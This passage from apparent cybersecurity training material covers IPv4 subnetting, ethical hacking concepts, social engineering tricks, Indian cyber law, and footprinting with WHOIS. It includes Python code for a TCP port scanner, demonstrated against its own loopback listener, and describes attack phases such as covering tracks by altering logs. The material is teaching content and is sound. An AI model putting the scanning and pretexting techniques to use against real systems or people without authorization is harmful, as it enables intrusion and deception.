we can fully understand all the above.
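The mask table above and the earlier point that a device will not accept just any mask both come down to one rule: a subnet mask is a run of one-bits followed by a run of zero-bits. The Python below is an added example (not part of the original course material); it builds the table from the number of borrowed bits, finds the class and default mask of an address, and rejects a non-contiguous mask such as 255.0.255.0. The class boundaries and default prefix lengths are the classful ones used in the text; the function names are my own.

```python
import ipaddress

# Classful defaults from the text: class letter -> default prefix length.
DEFAULT_PREFIX = {"A": 8, "B": 16, "C": 24}


def address_class(ip):
    """Classful letter for an IPv4 address, decided by its first octet."""
    first = int(ipaddress.IPv4Address(ip)) >> 24
    if first < 128:
        return "A"
    if first < 192:
        return "B"
    if first < 224:
        return "C"
    if first < 240:
        return "D"  # multicast, no default subnet mask
    return "E"      # reserved


def mask_from_prefix(prefix_len):
    """Dotted-decimal mask with `prefix_len` leading one-bits (0..32)."""
    if not 0 <= prefix_len <= 32:
        raise ValueError("prefix length must be between 0 and 32")
    value = (0xFFFFFFFF << (32 - prefix_len)) & 0xFFFFFFFF
    return str(ipaddress.IPv4Address(value))


def mask_for_class(net_class, borrowed_bits):
    """Mask after borrowing `borrowed_bits` host bits from a class's default mask."""
    return mask_from_prefix(DEFAULT_PREFIX[net_class] + borrowed_bits)


def default_mask(ip):
    """Default (classful) mask for the class an address belongs to."""
    cls = address_class(ip)
    if cls not in DEFAULT_PREFIX:
        raise ValueError(f"class {cls} addresses have no default subnet mask")
    return mask_for_class(cls, 0)


def prefix_from_mask(mask):
    """Prefix length of a valid mask; raises ValueError for a non-contiguous mask."""
    value = int(ipaddress.IPv4Address(mask))
    ones = bin(value).count("1")
    # Rebuild a mask with the same number of one-bits pushed to the left and
    # compare: any gap in the run of ones (e.g. 255.0.255.0) makes them differ.
    if value != ((0xFFFFFFFF << (32 - ones)) & 0xFFFFFFFF):
        raise ValueError(f"{mask} is not a valid subnet mask: one-bits are not contiguous")
    return ones


def is_valid_mask(mask):
    """True when a device would accept `mask` as a subnet mask."""
    try:
        prefix_from_mask(mask)
        return True
    except ValueError:
        return False


def mask_table():
    """Reproduce the 'Common Subnet Masks' table: {bits_borrowed: {class: mask}}."""
    return {bits: {c: mask_for_class(c, bits) for c in DEFAULT_PREFIX}
            for bits in range(9)}


if __name__ == "__main__":
    for bits, row in mask_table().items():
        print(bits, row["A"], row["B"], row["C"])
    print(address_class("192.168.0.1"), default_mask("192.168.0.1"))
    print(is_valid_mask("255.255.255.224"), is_valid_mask("255.0.255.0"))
```

The contiguity check in `prefix_from_mask` is the one a network stack performs when you type a mask into an interface: count the one-bits, rebuild the mask they would form if they were all on the left, and reject anything that differs.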
Here we are going to analyse a Class C network with 3 bits taken from the Host ID. The
analysis takes place once we convert our decimal numbers to binary, something that's essential
for this type of work. We will see how we get 8 networks from such a configuration, and their
ranges!
Figure 1.21
In this first part we can see clearly where the 8 networks come from. The rule applies to all
subnets, no matter what Class they are in: raise 2 to the number of subnet bits and you get the
number of networks (2^3 = 8 here). Now, that was the easy part.
The second part is slightly more complicated and I need you focused so you don't get mixed up!
At first the diagram below seems quite complex, so try to follow me as we go through it:
Figure 1.22
The IP address and subnet mask are shown in binary format. We focus on the last octet, which
contains all the information we are after. The last octet now has 2 parts, the Subnet ID (the
3 borrowed bits) and the Host ID (the remaining 5 bits). When we want to calculate the subnets
and hosts, we deal with them one at a time. Once that's done, we put the Subnet ID and Host ID
portions back together to get the last octet's decimal number.
We know we have 8 networks (or subnets) and, by simply incrementing our binary value by one
each time, we get to see all the networks available. So we start off with 000 and finish at
111. On the right-hand side I have also put the equivalent decimal number for each network.
Next we take the Host ID portion, where the first available host is 00001 (1 in decimal),
because the 00000 (0 in decimal) value is reserved as the Network Address of that subnet (see
IP Classes page), and the last value, 11111 (31 in decimal), is used as the Broadcast Address
of that subnet (see Broadcast page).
!Note
I gave a formula on the IP Classes page that lets you calculate the available hosts, and that is exactly
what we are doing here for each subnet. The formula is 2^X - 2, where X is the number of bits in the
Host ID field, which for our example is 5. Applying it, we get 2^5 - 2 = 30 valid (usable) IP addresses
per subnet. If you're wondering why we subtract 2, it's because one address is used as the Network
Address of that subnet and the other as its Broadcast Address. This shouldn't be news to anyone :)
Summing up, these are the ranges for each subnet in our new network:
Figure 1.23
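The binary walk of Figures 1.22 and 1.23, carried out in code. The Python below is an added example, not part of the original course: it splits 192.168.0.0/24 with the mask 255.255.255.224, lists network, first host, last host and broadcast for each of the 8 subnets, applies the 2^X - 2 rule for usable hosts, and answers the question behind Figure 1.20, whether two hosts see each other as local under a given mask. It cross-checks its own arithmetic against the standard library's `ipaddress` module. The /31 and /32 cases, where the classic rule breaks down, are handled explicitly (RFC 3021 point-to-point links and single host routes respectively). Function names are my own.

```python
import ipaddress


def usable_hosts(host_bits):
    """Usable addresses in a subnet with `host_bits` host bits.

    Classic rule: 2**host_bits - 2 (network and broadcast are not assignable).
    Edge cases the rule does not cover:
      /32 (0 host bits): one address, a single host route.
      /31 (1 host bit): RFC 3021 allows both addresses on a point-to-point link.
    """
    if host_bits == 0:
        return 1
    if host_bits == 1:
        return 2
    return 2 ** host_bits - 2


def split_network(network, new_mask):
    """Subnet `network` ('192.168.0.0/24') with `new_mask` ('255.255.255.224').

    Returns one dict per subnet, in the same order as counting the subnet-ID
    field in binary from all zeros to all ones.
    """
    base = ipaddress.ip_network(network, strict=True)
    new_prefix = ipaddress.ip_network(f"0.0.0.0/{new_mask}").prefixlen
    if new_prefix < base.prefixlen:
        raise ValueError("the new mask must borrow bits, not give them back")
    subnet_bits = new_prefix - base.prefixlen   # bits borrowed from the Host ID
    host_bits = 32 - new_prefix                 # bits left for hosts

    subnets = []
    base_int = int(base.network_address)
    for subnet_id in range(2 ** subnet_bits):
        net_int = base_int | (subnet_id << host_bits)      # host bits all 0
        bcast_int = net_int | ((1 << host_bits) - 1)       # host bits all 1
        if host_bits >= 2:
            first, last, bcast = net_int + 1, bcast_int - 1, bcast_int
        else:
            # /31 and /32: every address is a host address, no broadcast
            first, last, bcast = net_int, bcast_int, None
        subnets.append({
            "subnet_id_bits": format(subnet_id, "b").zfill(subnet_bits),
            "network": str(ipaddress.IPv4Address(net_int)),
            "first_host": str(ipaddress.IPv4Address(first)),
            "last_host": str(ipaddress.IPv4Address(last)),
            "broadcast": None if bcast is None else str(ipaddress.IPv4Address(bcast)),
            "usable_hosts": usable_hosts(host_bits),
        })

    # Cross-check the hand-rolled arithmetic against the standard library.
    expected = [str(s.network_address) for s in base.subnets(new_prefix=new_prefix)]
    assert [s["network"] for s in subnets] == expected
    return subnets


def same_subnet(ip_a, ip_b, mask):
    """True if two hosts configured with `mask` see each other as local (Figure 1.20)."""
    net_a = ipaddress.ip_interface(f"{ip_a}/{mask}").network
    net_b = ipaddress.ip_interface(f"{ip_b}/{mask}").network
    return net_a == net_b


if __name__ == "__main__":
    for s in split_network("192.168.0.0/24", "255.255.255.224"):
        print(s["subnet_id_bits"], s["network"], s["first_host"], "-", s["last_host"],
              "bcast", s["broadcast"], "usable", s["usable_hosts"])
    print(same_subnet("192.168.0.10", "192.168.0.40", "255.255.255.0"))    # True
    print(same_subnet("192.168.0.10", "192.168.0.40", "255.255.255.224"))  # False
```

Running it prints the eight rows of Figure 1.23 (192.168.0.0 to 192.168.0.31 with hosts .1 to .30, then .32 to .63, and so on up to .224 to .255), and shows that 192.168.0.10 and 192.168.0.40 are neighbours under 255.255.255.0 but land in different subnets under 255.255.255.224, which is exactly why Figure 1.20 looks different from Figure 1.19.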
Figure 1.24
1.8 Check your Progress
Fill in the blanks
1) An IP address consists of __________ bits.
2) The __________ identifies a unique device within the network.
3) The address __________ is often used to refer to the local host.
4) When we subnet a network, we basically __________ it into smaller networks.
5) If the subnet mask is 255.255.255.254, then a network with only __________ host(s) per subnet can be
configured.
Check Your Progress Answers:
1.1, 1.2, 1.3
1) client
2) Broadcasting
3) WAN
4) MAN
1.4, 1.5
1) Network bridge
2) NIC
3) Routers
4) CAT1
1.6, 1.7
1) Packet switching
2) TCP
3) UDP
4) SMTP
1.8
1) 32
2) Host ID
3) 127.0.0.1
4) split
5) No usable hosts under the classic 2^n - 2 rule (one host bit, 2^1 - 2 = 0); RFC 3021 permits
this mask on point-to-point links, with exactly two hosts and no broadcast address.
Chapter-2
Introduction to Cyber Security & Ethical
Hacking
Session Objectives:
At the end of this Session, you will be able to understand –
Why Is Cyber Security A Problem?
What Is Hacking?
Essential Terminology Used In Hacking
What Does A Malicious Hacker / Crackers Do?
What Do Ethical Hackers Do?
Hacktivism & Computer Crimes and Implications
Types of Cyber Crime
Indian IT Act 2000
What is Social Engineering?
What is Reverse Social Engineering?
Introduction____________________________________
Why Cyber Security?
You must have heard news stories about credit card numbers being stolen and email viruses
spreading. Maybe you have even been a victim yourself. One of the best defenses is to
understand the risks, understand some of the basic terms of cyber crime, and know how to
protect yourself against them.
2.1 What is cyber security?_______________________
It seems that everything relies on computers and the Internet nowadays: communication (email,
cell phones), entertainment (digital cable, mp3s), transportation (car engine systems, airplane
navigation), shopping (online stores, credit/debit cards), medicine (equipment, medical
records), and the list goes on. How much of your daily life relies on computers? How much of
your personal information is stored either on your own computer or on someone else's system?
Cyber security involves protecting that information by preventing, detecting, and responding
to attacks.
2.2 What is Hacking?____________________________
Hacking means illegally accessing other's computer systems for destroying, disrupting
or carrying out illegal activities on the network or on computer systems.
2.2.1 Who are Hackers?
HACKER noun A person who enjoys learning the details of computer systems and how
to stretch their capabilities—as opposed to most users of computers, who prefer to learn
only the minimum amount necessary. One who programs enthusiastically or who enjoys
programming rather than just theorizing about programming.
2.2.2 What is Ethical Hacking?
Computer security has become a major concern for businesses and governments. With the growth
of the Internet they want to take advantage of it for e-commerce, advertising, information
distribution and access, and other pursuits, but they are worried about the possibility of
being "hacked". At the same time, the potential customers of these services are worried about
keeping control of personal information that ranges from credit card numbers to social
security numbers and home addresses. In their search for a way to approach the problem,
organizations realized that one of the best ways to evaluate the intruder threat to their
interests would be to have independent computer security professionals attempt to break into
their computer systems.
In the case of computer security “Ethical Hackers” would employ the same tools and
techniques as the intruders, but they would neither damage the target systems nor steal
any information.
Instead, they would evaluate the target systems' security and report back to the owners
with the vulnerabilities they found and instructions for how to remedy them.
2.2.3 Who are Ethical Hackers?
These are security professionals who use their knowledge and skills for defensive purposes
and help to investigate and prevent cyber crime and fraud.
2.2.4 Who are crackers?
These are people who commit cyber crimes and frauds, using their knowledge for offensive
purposes. They are the bad guys who engage in cyber criminal activities.
2.2.5 Hackers Vs Crackers
Features of Hackers
• Lots of knowledge, experience and skill
• Good guys
• Strong ethics
• Never indulge in cyber crime
• Catch computer criminals
Features of Crackers
• Lots of knowledge, experience and skill
• Bad guys
• Low ethics
• Mostly indulge in crime
• Are computer criminals themselves
2.2.6 Classes of Hackers
Hackers are basically classified into three types:
• Black Hat Hackers
  Individuals with extraordinary computing skill who resort to malicious or destructive
  activities are known as Crackers or Black Hat Hackers.
• White Hat Hackers
  Individuals professing hacking skills and using them for defensive purposes, along with
  ethics, are known as White Hat Hackers or Security Analysts.
• Grey Hat Hackers
  Individuals who work both offensively and defensively at various times, as suits them, are
  known as Grey Hat Hackers.
2.1, 2.2 Check your Progress
Fill in the blanks
1) Cyber security involves protecting that information by preventing, __________, and __________ to
different attacks.
2) __________ are the people who indulge in cyber crimes and frauds and use their knowledge for
offensive purposes.
3) Individuals professing hacking skills and using them for defensive purposes along with the ethics are
known as __________ or Security Analyst.
4) Individuals who work both offensively and defensively at various times as per their benefits are known
as __________.
2.3 Terminologies used in Hacking_________________
Threat – An action or event that might prejudice security. A threat is a potential
violation of security.
Vulnerability – Existence of a weakness, design, or implementation error that can lead
to an unexpected, undesirable event compromising the security of the system.
Target of Evaluation – An IT system, product, or component that is identified/
subjected as requiring security evaluation.
Attack – An assault on system security that derives from an intelligent threat. An attack
is any action that violates security.
Exploit – A defined way to breach the security of an IT system through vulnerability.
2.4 What does a Malicious hacker / Crackers do?_____
• A malicious hacker tries to gather as much information as possible about the target of
evaluation before launching an attack. This process is called reconnaissance, whether
active or passive, and it involves scanning the network, internally or externally, without
authorization.
• Passive reconnaissance means monitoring network data for patterns and clues. This
includes sniffing attacks and information-gathering tools.
• Active reconnaissance involves probing the network to detect:
  - Accessible hosts
  - Open ports
  - Locations of routers
  - Details of operating systems and services
• The second step in gathering information is scanning. Scanning is the pre-attack phase in
which the hacker scans the network using the specific information gathered during
reconnaissance: an attempt to find the weaknesses of a computer or network by probing
system ports with requests for information. It can be used maliciously to detect and exploit
weaknesses. Scanning can include the use of dialers, port scanners, network mapping,
sweeping, vulnerability scanners, etc.
Figure 2.1
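The "open ports" part of the scanning phase is, at its simplest, a TCP connect scan: try to complete a three-way handshake with each port and note which ones accept. The Python below is an added example, not from the original course. It scans a list of ports with a short timeout and a thread pool and, so that it runs stand-alone, starts its own constructed target: a listener on an ephemeral loopback port, plus a loopback port known to be closed. Function names are my own.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def probe_port(host, port, timeout=0.5):
    """TCP connect probe: True only if the three-way handshake completes.

    A RST (ConnectionRefusedError) means the port is closed; a timeout usually
    means a firewall silently dropped the SYN, which real scanners report as
    'filtered'. Both are treated as not open here.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except (ConnectionRefusedError, socket.timeout, OSError):
            return False


def scan_ports(host, ports, timeout=0.5, workers=32):
    """Return the sorted list of ports in `ports` that accept a TCP connection."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda p: (p, probe_port(host, p, timeout)), ports))
    return sorted(port for port, is_open in results if is_open)


def start_demo_listener(host="127.0.0.1"):
    """Constructed scan target: a TCP listener on an ephemeral loopback port.

    Returns (port, stop) where stop() shuts the listener down.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))           # port 0 lets the OS pick a free port
    srv.listen(16)
    srv.settimeout(0.2)           # so the accept loop can notice stop()
    port = srv.getsockname()[1]
    stopped = threading.Event()

    def serve():
        while not stopped.is_set():
            try:
                conn, _ = srv.accept()
                conn.close()      # a completed handshake is all a scanner needs to see
            except socket.timeout:
                continue
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stopped.set


def closed_loopback_port():
    """Find a loopback port that is currently closed (bind it, read it, release it)."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo():
    """Scan one open and one closed loopback port; returns (open_port, closed_port, found)."""
    open_port, stop = start_demo_listener()
    closed_port = closed_loopback_port()
    try:
        found = scan_ports("127.0.0.1", [open_port, closed_port])
    finally:
        stop()
    return open_port, closed_port, found


if __name__ == "__main__":
    o, c, found = demo()
    print(f"listener on {o}, closed port {c}, scan reports open: {found}")
```

From the defender's side, every probe above leaves a complete TCP connection in the target's logs and connection tables, which is why a connect scan is the noisiest kind and why a burst of connections to many ports from one source is the classic signature a detection system looks for.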
• The next step is gaining access, and this is the true attack phase. The hacker exploits the
system. The exploit can occur over a LAN, locally, over the Internet, offline, or as deception
or theft. Examples include stack-based buffer overflows, denial of service, session hijacking
and password cracking.
• Maintaining access is the next phase: the hacker tries to retain his 'ownership' of the
system. Having exploited a vulnerability, the hacker can tamper with and compromise the
system, and can upload, download or manipulate data, applications and configurations on the
'owned' system.
• Finally, on exit from the target, the attacker tries to cover his tracks by renaming the files
he installed or by moving them to parts of the directory structure where they are not easily
detected. The attacker may also manipulate the system's log files and control programs so
that the attack goes unnoticed.
2.5 What do the Ethical Hackers do?_______________
Ethical hackers do the same job as crackers; the one major difference is their attitude.
Ethical hackers are trustworthy and work with a positive attitude: they work for security and
try to stop or prevent cyber crime.
The job of the ethical hacker is to:
• Scan the system, network or website as a cracker would, so that it can be secured better.
• Try to gain access to the system, network or website, so that the vulnerabilities found can
be closed.
• Carry out penetration testing, searching in depth for loopholes in the ports and services of
web servers, networks, operating systems and the applications used by the business.
2.6 Types Of Attacks_____________________________
2.6.1 Non-Technical Attacks
Non-technical attack is the human element of hacking. The saying "there is nothing new under
the sun" is extremely relevant here. In most cases a hacker will use a computer to gather
information, but using psychology to gain access to systems and services has been around a lot
longer than computers. Used together, non-technical attacks, hardware and software can be a
very effective information-gathering tool (whether it is legal or not!).
Non-technical methodology can be split up into the following areas:
2.6.1.1 Bribery
This is the easiest way to gain information. Bribery can be as direct as cash payments
or something more subtle. Bribery can lead to blackmail in order to maintain access to
the source of information.
2.6.1.2 Social Engineering
Social engineering is the collection of information from people rather than from systems,
information that can then be used in a technical attack. It could be as simple as someone
phoning an employee, pretending to be a member of the computer support team and asking for
their user ID and password. Individuals have been known to seek employment within an
organization with the sole aim of gathering information to attack the employing company or
pass secrets to a competitor.
2.6.1.3 Shoulder Surfing
Shoulder Surfing involves the collection of information by eavesdropping. It usually
doesn’t involve much technology although it has been known for hackers to use video
cameras, binoculars and audio bugs to gain information.
2.6.2 Technical attacks
2.6.2.1 Network Attacks
Network attacks are easy to attempt, because many networks can be reached and attacked from
any part of the world via the Internet. A few examples of network-infrastructure attacks:
• Connecting into a network through a rogue modem attached to a computer behind a firewall.
• Exploiting weaknesses in network transport mechanisms, such as TCP/IP and NetBIOS.
• Flooding a network with too many requests, creating a denial of service (DoS) for
legitimate requests.
• Installing a network analyzer on a network and capturing every packet that travels across
it, revealing confidential information sent in clear text.
• Piggybacking onto a network through an insecure 802.11b wireless configuration.
2.6.2.2 Operating System Attacks
Operating system (OS) attacks are the second most frequent kind of attack used by crackers,
and make up a large portion of all hacker attacks, simply because every computer has an
operating system and there are many well-known exploits that can be used against them.
Crackers prefer to attack operating systems such as Windows and Linux because they are widely
used and their vulnerabilities are well known.
Here are some examples of attacks on operating systems:
• Exploiting specific protocol implementations.
• Attacking built-in authentication systems.
• Breaking file-system security.
• Cracking passwords and encryption mechanisms.
2.6.2.3 Application Attacks
Applications (OS-based, network-based and web-based applications, and web services including
e-commerce) hold business, financial and confidential information, and attacks aimed at
capturing that information take a lot of hits from crackers. Programs such as e-mail server
software and web applications are often attacked:
• Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol (SMTP) applications are
frequently attacked because most firewalls and other security mechanisms are configured to
allow full access to these services from the Internet.
• Malicious software (malware) includes viruses, worms, Trojan horses and spyware. Malware
clogs networks and takes down systems.
2.7 CYBER LAW_________________________________
India enacted the Information Technology Act 2000 based on the UNCITRAL Model Law on
Electronic Commerce recommended by the General Assembly of the United Nations. The Act deals
with offences and crimes, along with certain other provisions scattered through the Act. The
various offences are listed below:
Offence                                              Section under I.T. Act 2000
Tampering with computer source documents             Sec. 65
Hacking with computer systems, data alteration       Sec. 66
Publishing obscene information                       Sec. 67
Unauthorized access to a protected system            Sec. 70
Breach of confidentiality and privacy                Sec. 72
Publishing false digital signature certificates      Sec. 73
NOTE: Sec. 78 of the I.T. Act empowers a Deputy Superintendent of Police to investigate cases
falling under this Act.
Computer Related Crimes Covered under IPC and Special Laws
Offence                                              Section
Sending threatening messages by email                Sec. 503 IPC
Sending defamatory messages by email                 Sec. 499 IPC
Forgery of electronic records                        Sec. 463 IPC
Bogus websites, cyber frauds                         Sec. 420 IPC
Email spoofing                                       Sec. 463 IPC
Web-jacking                                          Sec. 383 IPC
E-mail abuse                                         Sec. 500 IPC
Online sale of drugs                                 NDPS Act
Online sale of arms                                  Arms Act
2.11 What is Social Engineering?______
Social engineering is hacker-speak for tricking a person into revealing their password. A
classic social engineering trick is for a hacker to send email claiming to be a system
administrator. The hacker will claim to need your password for some important system
administration work, and ask you to email it to him or her. As we explain later, it is possible
for a hacker to forge email, making it look like it came from somebody you know to be a
legitimate system administrator. Often the hacker will send this message to every user on a
system, hoping that one or two users will fall for the trick. A common variation is to do this
by phone, talk or IRC.
An employee may unwittingly give away key information in an email, by answering questions
over the phone from someone they don't know, or even by talking about a project with co-workers
at a local pub after hours. Companies with authentication processes, firewalls, virtual private
networks and network monitoring software are still wide open to such attacks.
2.12 Art of Manipulation__________________________
Social engineering is the acquisition of sensitive information or inappropriate access
privileges by an outsider, based upon the building of inappropriate trust relationships with
insiders.
The goal of a social engineer is to trick someone into providing valuable
information or access to that information.
It preys on qualities of human nature, such as the desire to be helpful, the
tendency to trust people and the fear of getting in trouble.
2.13 Human Weakness___________________________
People are usually the weakest link in the security chain.
A successful defense depends on having good policies in place and educating
employees to follow the policies.
Social Engineering is the hardest form of attack to defend against because it
cannot be defended with hardware or software alone.
2.14 Common Types of Social Engineering__________
Social Engineering can be broken into two types i.e. human based and computer based
Human-based Social Engineering refers to person to person interaction to
retrieve the desired information.
Computer based Social Engineering refers to having computer software that
attempts to retrieve the desired information.
2.15 Human based – Impersonation________________
Human-based social engineering techniques can be broadly categorized into:
• Impersonation
• Posing as an important user
• Third-person approach
• Technical support
• In person
• Dumpster diving
• Shoulder surfing
2.16 Dumpster Diving____________________________
Dumpster diving is the colloquial name for going through somebody's rubbish - which
will usually be found in dumpsters (rubbish skips) for large organizations or bins for the
general public.
In the corporate environment this could be used in the first stage of an intrusion. The
hacker can map out the victim, understand the way the organization works and, in some cases,
find out passwords and account names (written on Post-it notes! Does this sound familiar?).
They could even find out enough specific information (such as a takeover bid or proprietary
application details) to make further attacks unnecessary.
2.17 Shoulder Surfing____________________________
Shoulder Surfing involves the collecting of information by eavesdropping. It usually
doesn’t involve much technology although it has been known for hackers to use video
cameras, binoculars and audio bugs to gain information.
You can quite often find shoulder surfers in busy places such as airports. Simply listening
to two people having a conversation can give valuable information about those individuals and
their organization. Lip-reading has the additional benefit of only requiring line of sight,
not audible range. Watching keystrokes can provide you with password details, and reading
someone's screen can give you valuable information. Next time you're in a departure lounge,
take a look at the number of people who are using laptops. Are they working securely?
2.18 Computer Based Social Engineering___________
These can be divided into the following broad categories:
• Mail / IM attachments
• Pop-up Windows
• Websites / Sweepstakes
• Spam Mail
Figure 2.2
2.19 Reverse Social Engineering___________________
• A more advanced method of gaining illicit information is known as "reverse social
engineering".
• This is when the hacker creates a persona that appears to be in a position of authority, so
that employees will ask him for information rather than the other way around.
• The three parts of a reverse social engineering attack are sabotage, advertising and
assisting.
2.20 Policies and Procedures______________________
• Policy is the most critical component of any information security program.
• Good policies and procedures are not effective if they are not taught and reinforced to
employees.
• They need to be taught in a way that emphasizes their importance.
• After receiving training, employees should sign a statement acknowledging that they
understand the policies.
_______________________________________________________________________________________
Cyber Security Level -1 /40
Chapter-3
Information Gathering
Session Objectives:
At the end of this Session, you will be able to understand –
Steps for Gathering Information
Some Utilities And Techniques Are:
Unearthing Initial Information
ARIN
TCP 3-Way Handshake
Port Scanning
Objectives of Scanning:
Proxy Servers
Anonymizers
Introduction____________________________________
Footprinting
Footprinting is the first, and usually the easiest, step an attacker takes to gather information about computer systems and the organisations they belong to. The purpose of footprinting is to learn as much as possible about a target: its remote access capabilities, its ports and services, and how it is secured. The more an attacker knows about a system before attempting to break into it, the better the chance of success.
3.1 Steps for gathering information_________________
Information gathering is the process of learning as much as possible about the target system. The steps are as follows:
Step 1: Always define your target before starting any activity.
Step 2: Once the target is defined, work out how to approach it. By analogy, to reach a friend's home I need the address of the destination; if I do not have it, I can obtain it through social engineering (asking relatives, friends and acquaintances) or by any other technique that yields the address. In the case of computers the address is the IP address, so to attack a site such as http://www.anupgirdhar.net you must first obtain its IP address or its DNS name.
3.2 Some Utilities and Techniques are:______________
- Ping command
- Email bouncing techniques
- Netstat
- Whois
Step 3: Once we have the IP address, we need to find the geographical location of the target. Some utilities and techniques for locating an IP address are:
- NeoTrace Pro
- VisualRoute (http://visualroute.visualware.com)
Step 4: Once you have the IP address or DNS name, look for a way into the website or other destination.
Example: Now that I have my friend's address and location, how do I get in? Through the door; if it is locked, through a window; if that is closed too, through the roof; failing that, by breaking a wall or digging a hole, because I want to enter at any cost. In the same way, computers have ports through which data can enter. There are two types of ports:
- Physical ports
- Virtual ports
Physical ports include:
Serial ports: COM1, COM2
Parallel ports: LPT1, LPT2
USB ports, etc.
These ports are used to connect hardware devices such as a mouse, modem, printer, scanner, webcam or external storage.
Virtual ports (TCP and UDP port numbers):
Virtual ports are used to make connections between computers and to accept requests that arrive from the network. When client/server software is installed, it generally listens on its own virtual port, through which it establishes connectivity and accepts requests from other machines; this is how a server handles multiple requests over the network.
Software that listens on such ports includes:
RDBMS packages (Oracle, SQL Server, etc.)
Network software (proxy servers) and the standard services for protocols such as:
PROTOCOL   PORT
HTTP       80
FTP        21
TELNET     23
SMTP       25
So we scan the ports of the target IP address to find out which are open, and then try to enter through those ports.
3.3 The Software and Utilities are__________________
- Nmap
- Port Scan
- Shadow Scan, etc.
3.4 Unearthing Initial Information__________________
Commonly includes:
- Domain name lookup
- Locations
- Contacts (telephone / mail)
Information sources:
- Open source
- Whois
- Nslookup
3.5 What Is WHOIS?_____________________________
- A directory service
- A protocol and an application
- Client/server based
- InterNIC and DDN (Defense Data Network) directories
- Other WHOIS directories
3.5.1 WHOIS actually refers to three things:
1. Searchable directories, maintained by the InterNIC and the Defense Data
Network's Network Information Center (DDN NIC), which contain information
about networks, networking organizations, domains, sites, and the contacts
associated with them.
2. The protocol, or set of rules, used by the application to access these directories.
3. Any directory based on the WHOIS protocol.
The information found in the InterNIC and DDN NIC's WHOIS directories includes:
domain names and IP addresses, contact names, company names, postal and
electronic mail addresses, phone numbers, etc.
3.5.2 WHOIS is used:
- To find information about networks, domains, and hosts
- To locate contact information (people) for networks and domains, and, when registering a domain name, to see if the name is already in use
WHOIS works on the client/server principle. A WHOIS client program enables the user's computer to contact a WHOIS server, submit a search query, and receive a response to that query.
3.5.3 WHOIS can be accessed in a number of ways:
- through a local WHOIS client,
- an interactive telnet session to the server's WHOIS port (TCP 43), or
- e-mail or a web-based form (at the InterNIC).
3.5.4 The WHOIS Command
The /usr/bin/whois command searches a user-name directory and displays information about the user ID or nickname specified in the Name parameter. By default it contacts the host internic.net, where it examines a user-name database to obtain the information. This description is taken from the classic UNIX manual page and refers to the ARPANET-era directories. RFC 812, which it cites, was the original NICNAME/WHOIS specification; it was obsoleted by RFC 954 and later by RFC 3912, which describes the protocol as used today. The hosts you query now are the individual domain registries and the regional Internet registries (such as ARIN, section 3.8).
3.5.5 Syntax
whois [ -h Hostname ] [ . | ! ] [ * ] Name [ ... ]
The Name [...] parameter represents the user ID, host name, network address, or nickname on which to perform a directory search. The whois command performs a wildcard search for any name that matches the string preceding the optional ... (three periods).
Flags
.    Forces a name-only search for the name specified in the Name parameter.
!    Displays help information for the nickname or handle ID specified in the Name parameter.
*    Displays the entire membership list of a group or organization. If there are many members, this can take some time.
?    Requests help from the ARPANET host.
-h Hostname    Specifies an alternative host name. The default host name on the ARPANET is internic.net. You can contact the other major ARPANET user-name database, nic.ddn.mil, by specifying the -h Hostname flag.
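The client/server exchange described above, as an added example that is not part of the original manual and not the code of any whois program it names: a minimal WHOIS client in Python that speaks the protocol as RFC 3912 specifies it (TCP port 43, the query terminated by CRLF, the reply read until the server closes the connection), together with an in-process mock registry so that the example runs offline. The name example.test and the record it returns are constructed; against a real registry you would pass the registry's host name instead of 127.0.0.1 and leave the port at its default of 43.

```python
"""Minimal WHOIS client (RFC 3912) plus an in-process mock registry so the example runs offline.
Added example; example.test and the record below are constructed, not real registration data."""
import socket
import socketserver
import threading

SAMPLE_RECORDS = {
    "example.test": (
        "Domain Name: EXAMPLE.TEST\r\n"
        "Registrar: Example Registrar, Inc.\r\n"
        "Name Server: NS1.EXAMPLE.TEST\r\n"
        "Name Server: NS2.EXAMPLE.TEST\r\n"
        "Registrant Email: hostmaster@example.test\r\n"
        "Admin Phone: +1.5555550100\r\n"
    ),
}


def whois_query(name, server, port=43, timeout=5.0):
    """One WHOIS transaction: open TCP to the server, send the query terminated by CRLF,
    then read until the server closes the connection (RFC 3912 section 2)."""
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(name.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_whois(text):
    """Collect 'Key: value' lines into {lower-case key: [values]}; keys such as
    'Name Server' repeat, and comment lines starting with % or # are skipped."""
    fields = {}
    for line in text.splitlines():
        if line.startswith(("%", "#")) or ":" not in line:
            continue
        key, _, value = line.partition(":")
        fields.setdefault(key.strip().lower(), []).append(value.strip())
    return fields


class _MockRegistry(socketserver.StreamRequestHandler):
    """Server side of the same exchange: read one query line, answer it, close."""
    def handle(self):
        query = self.rfile.readline().strip().decode("ascii", errors="replace").lower()
        record = SAMPLE_RECORDS.get(query)
        if record is None:
            self.wfile.write(('No match for "%s".\r\n' % query).encode("ascii"))
        else:
            self.wfile.write(record.encode("ascii"))


def start_mock_server():
    """Start the mock registry on an ephemeral loopback port; returns (server, port)."""
    server = socketserver.TCPServer(("127.0.0.1", 0), _MockRegistry)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def lookup_against_mock(name):
    """Run a full client/server round trip against the mock and return the parsed fields."""
    server, port = start_mock_server()
    try:
        return parse_whois(whois_query(name, "127.0.0.1", port))
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    info = lookup_against_mock("example.test")
    print("name servers:", info.get("name server"))
    print("registrant:", info.get("registrant email"))
```

The parser keeps every value for a repeated key, which matters for the Name Server lines: those are exactly the hosts you point nslookup at in the next step. Real registries also prepend comment and rate-limit notices, which is why lines beginning with % or # are skipped.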
3.5.6 WHOIS
Figure 3.1
3.6 Nslookup___________________________________
